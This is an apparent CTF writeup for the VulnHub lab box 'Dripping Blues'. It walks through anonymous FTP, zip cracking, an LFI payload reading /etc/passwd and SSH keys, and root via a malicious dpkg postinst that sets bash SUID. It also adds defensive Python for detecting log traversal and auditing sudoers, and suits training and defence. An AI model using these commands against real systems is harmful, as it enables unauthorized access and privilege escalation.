CTF WRITEUP VULNHUB EASY

Dripping Blues — VulnHub Easy

Written By: Th0mas_sh316y
Difficulty: Easy
Platform: VulnHub
Target IP: 192.168.1.25

Machine: Dripping Blues · Easy · Linux · VulnHub

Dripping Blues is a multi-stage box that hits all the classic enumeration touchpoints — anonymous FTP, password-protected zip, hidden URL parameter, SSH, and a sudo binary in GTFOBins. None of the steps are individually hard but the chain teaches you to keep enumerating after each foothold. About 90 minutes start to finish.

01_Reconnaissance

FTP 21 + SSH 22 + HTTP 80. FTP allows anonymous login — there's a zip file sitting in the share.

terminal / nmap + ftp
$ nmap -sV -p- 192.168.1.25
21/tcp open  ftp     vsftpd (Anonymous: yes)
22/tcp open  ssh
80/tcp open  http

$ ftp anonymous@192.168.1.25
ftp> ls
respectmydrip.zip
ftp> get respectmydrip.zip

02_fcrackzip_Dictionary_Attack

The zip is password-protected. fcrackzip with rockyou cracks it in seconds. Inside there's a hint pointing at a hidden URL parameter on the web server.

terminal / fcrackzip
$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt respectmydrip.zip
PASSWORD FOUND: pw == [REDACTED]

$ unzip respectmydrip.zip
> respectmydrip.txt — hint about a "drip" parameter

03_LFI_via_drip_Parameter

The web server has an index.php that accepts a drip parameter and includes the file directly. LFI to /etc/passwd reveals user accounts. Read the user's home directory for an SSH key or credentials.

terminal / LFI + ssh
$ curl "http://192.168.1.25/index.php?drip=../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
mysql:x:107:113:...
[user]:x:1000:1000

# Continue LFI to /home/[user]/.ssh/id_rsa or stash credentials
$ ssh [user]@192.168.1.25 -i id_rsa
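A defender-side check for this step, added here as an example and not part of the original writeup: it scans constructed Apache access-log lines (assumed combined format) for traversal in any query parameter, including single- and double-URL-encoded forms, and shows the containment check a fixed index.php would apply instead of including the drip value directly. The log lines, the /srv/www/html base directory and the function names are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache combined-format access-log lines (assumed format, not from the box).
# Lines 2-4 carry the same traversal as the writeup's drip parameter in plain,
# single-encoded and double-encoded form; lines 1 and 5 are benign.
SAMPLE_LOG = """\
192.168.1.50 - - [03/Nov/2021:10:14:02 +0000] "GET /index.php?drip=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.50 - - [03/Nov/2021:10:14:09 +0000] "GET /index.php?drip=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.74.0"
192.168.1.50 - - [03/Nov/2021:10:14:15 +0000] "GET /index.php?drip=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "curl/7.74.0"
192.168.1.50 - - [03/Nov/2021:10:14:21 +0000] "GET /index.php?drip=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843 "-" "curl/7.74.0"
192.168.1.51 - - [03/Nov/2021:10:15:00 +0000] "GET /style.css HTTP/1.1" 200 220 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path component in either slash style, anywhere in the value.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def decode_fully(value, rounds=3):
    """URL-decode until stable so %252e%252e (double-encoded '..') is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(log_text):
    """Return (source_ip, status, param, decoded_value) for each query parameter
    whose decoded value contains a '..' path component. parse_qs already decodes
    one layer; decode_fully handles the remaining ones."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlparse(m.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                decoded = decode_fully(value)
                if TRAVERSAL_RE.search(decoded):
                    hits.append((m.group("src"), int(m.group("status")), param, decoded))
    return hits


def resolve_include(base_dir, requested):
    """Hardened counterpart to include($_GET['drip']): decode the value, resolve it
    under base_dir and refuse anything whose real path escapes that directory.
    Returns the absolute path to include, or None to reject. (A fixed allowlist of
    page names is stricter still and is the better fix where the page set is known.)"""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decode_fully(requested)))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print("traversal attempt from %s (HTTP %d) via %s=%s" % hit)
    print(resolve_include("/srv/www/html", "about.php"))
    print(resolve_include("/srv/www/html", "../../../../etc/passwd"))
```

The detector reports the three traversal requests and ignores the benign ones; the resolver accepts about.php under the web root and rejects the /etc/passwd traversal even when it arrives double-encoded. A 200 status on a flagged request, as in the sample, is the signal that the include actually succeeded and the host should be treated as compromised.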

04_PrivEsc_via_dpkg_sudo

sudo -l shows passwordless dpkg. GTFOBins covers this — install a malicious .deb package or use the --listfiles shell escape, depending on the version.

terminal / dpkg GTFOBins
$ sudo -l
(root) NOPASSWD: /usr/bin/dpkg

# GTFOBins — build malicious .deb with postinst
$ TF=$(mktemp -d)
$ mkdir -p "$TF/DEBIAN" "$TF/usr/local/bin"
$ echo "#!/bin/bash" > "$TF/DEBIAN/postinst"
$ echo "chmod +s /bin/bash" >> "$TF/DEBIAN/postinst"
$ chmod +x "$TF/DEBIAN/postinst"
$ printf "Package: pwn\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: x" > "$TF/DEBIAN/control"
$ dpkg-deb -b "$TF" /tmp/pwn.deb
$ sudo dpkg -i /tmp/pwn.deb

$ /bin/bash -p
# id
uid=1000 euid=0(root)
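On the defensive side, the entry sudo -l shows is exactly what a sudoers audit should catch. The following is an added example, not from the writeup or from GTFOBins: it parses a constructed sudoers excerpt (the ctfuser name and the other entries are made up), flags NOPASSWD rules that hand root a binary with a documented shell escape, and notes whether the rule pins arguments. SHELL_ESCAPE_BINS is a small assumed subset of the GTFOBins sudo list; it also generalizes past dpkg, so the rsync entry is flagged as well.

```python
import os
import re

# Constructed /etc/sudoers excerpt (not the box's real file). The ctfuser line
# mirrors the "(root) NOPASSWD: /usr/bin/dpkg" entry from sudo -l above.
SAMPLE_SUDOERS = """\
# constructed example
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
ctfuser ALL=(root) NOPASSWD: /usr/bin/dpkg
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) /usr/bin/systemctl restart nginx
"""

# Subset of binaries with a documented sudo shell escape on GTFOBins (assumed list;
# extend it from the site for a real audit).
SHELL_ESCAPE_BINS = {
    "dpkg", "apt", "apt-get", "vim", "vi", "less", "more", "find", "tar",
    "zip", "rsync", "awk", "perl", "python", "python3", "env", "bash", "sh",
}

RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$')
TAG_RE = re.compile(r'^([A-Z]+):\s*')


def parse_rules(text):
    """Split sudoers user specs into one record per command. Comments, blank lines
    and Defaults are skipped; aliases and #include directives are out of scope."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds, tags = m.group("cmds"), set()
        while (t := TAG_RE.match(cmds)):   # NOPASSWD:, SETENV:, ... precede the command list
            tags.add(t.group(1))
            cmds = cmds[t.end():]
        for cmd in (c.strip() for c in cmds.split(",")):
            rules.append({"who": m.group("who"), "runas": m.group("runas"),
                          "tags": tags, "cmd": cmd})
    return rules


def audit(text):
    """Flag NOPASSWD rules that run ALL or a shell-escapable binary as root (or as ALL).
    'unrestricted' means no arguments are pinned, so any invocation such as
    dpkg -i <package> is permitted, which is the situation on this box."""
    findings = []
    for r in parse_rules(text):
        if "NOPASSWD" not in r["tags"]:
            continue
        parts = r["cmd"].split()
        binary = os.path.basename(parts[0])
        runas_user = r["runas"].split(":")[0] or "root"   # sudoers defaults runas to root
        escapable = binary == "ALL" or binary in SHELL_ESCAPE_BINS
        if escapable and runas_user in ("root", "ALL"):
            findings.append({
                "who": r["who"], "binary": binary, "cmd": r["cmd"],
                "arguments": "unrestricted" if len(parts) == 1 else "pinned",
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print("%(who)s may run %(cmd)s as root without a password (%(arguments)s arguments); "
              "%(binary)s has a known shell escape" % f)
```

Remediation for a flagged rule is to drop NOPASSWD, pin the exact arguments the job needs (a package-manager task is better served by a wrapper script that sudo allows by full path), or move the task to a systemd unit so the user never gets a root-run binary with open arguments.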

05_Attack_Chain_Summary

  1. 01 nmap → FTP/SSH/HTTP → anonymous FTP zip download
  2. 02 fcrackzip + rockyou → zip password → contents hint
  3. 03 index.php?drip=... → LFI → /etc/passwd + SSH key
  4. 04 SSH login → sudo -l shows dpkg NOPASSWD
  5. 05 dpkg-deb postinst payload → SUID bash → root